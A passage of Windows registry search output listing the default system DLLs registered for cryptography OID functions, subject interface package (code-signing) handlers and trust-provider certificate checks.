0\CryptSIPDllPutSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\System32\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\System32\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\System32\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\System32\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\System32\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptsvcDllCtrl\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\crypttpmeksvc.dll\0C:\Windows\System32\cryptcatsvc.dll\0C:\Windows\System32\webauthn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\GetSecureTime\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\SecureTimeAggregator.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyCTLUsage\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\cryptnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyRevocation\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\cryptnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2000 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2001 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2002 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2003 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2004 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2005 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2006 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2007 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2008 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2009 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2010 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2011 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2012 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2130 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2221 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2222 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2223 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.12.2.1 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.12.2.2 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.12.2.3 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.16.1.1 Dll REG_SZ C:\Windows\System32\cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.16.4 Dll REG_SZ C:\Windows\System32\cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.10 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.11 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.12 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.15 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.20 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.25 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.26 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.27 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.28 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.30 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.4 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.4.2 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.4.3 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.4.4 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.1.1 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.1 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.11 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.12 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.2 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.3 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.4 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2000 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2001 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2002 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2003 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2004 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2005 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2006 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2007 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2008 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2009 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2010 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2011 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2012 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2130 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2221 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2222 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2223 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.12.2.1 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.12.2.2 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.12.2.3 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.16.1.1 Dll REG_SZ C:\Windows\System32\cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.16.4 Dll REG_SZ C:\Windows\System32\cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.10 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.11 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.12 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.15 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.20 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.25 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.26 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.27 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.28 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.30 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.4 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.4.2 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.4.3 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.4.4 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.1.1 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.1 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.11 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.12 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.2 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.3 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.4 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllFormatObject\1.3.6.1.5.5.7.3.4 Dll REG_SZ C:\Windows\System32\cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllFormatObject\2.5.29.32 Dll REG_SZ C:\Windows\System32\cryptdlg.dll End of search: 207 match(es) found. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{7801EBD0-CF4B-11D0-851F-0060979387EA} $DLL REG_SZ C:\Windows\System32\Cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL 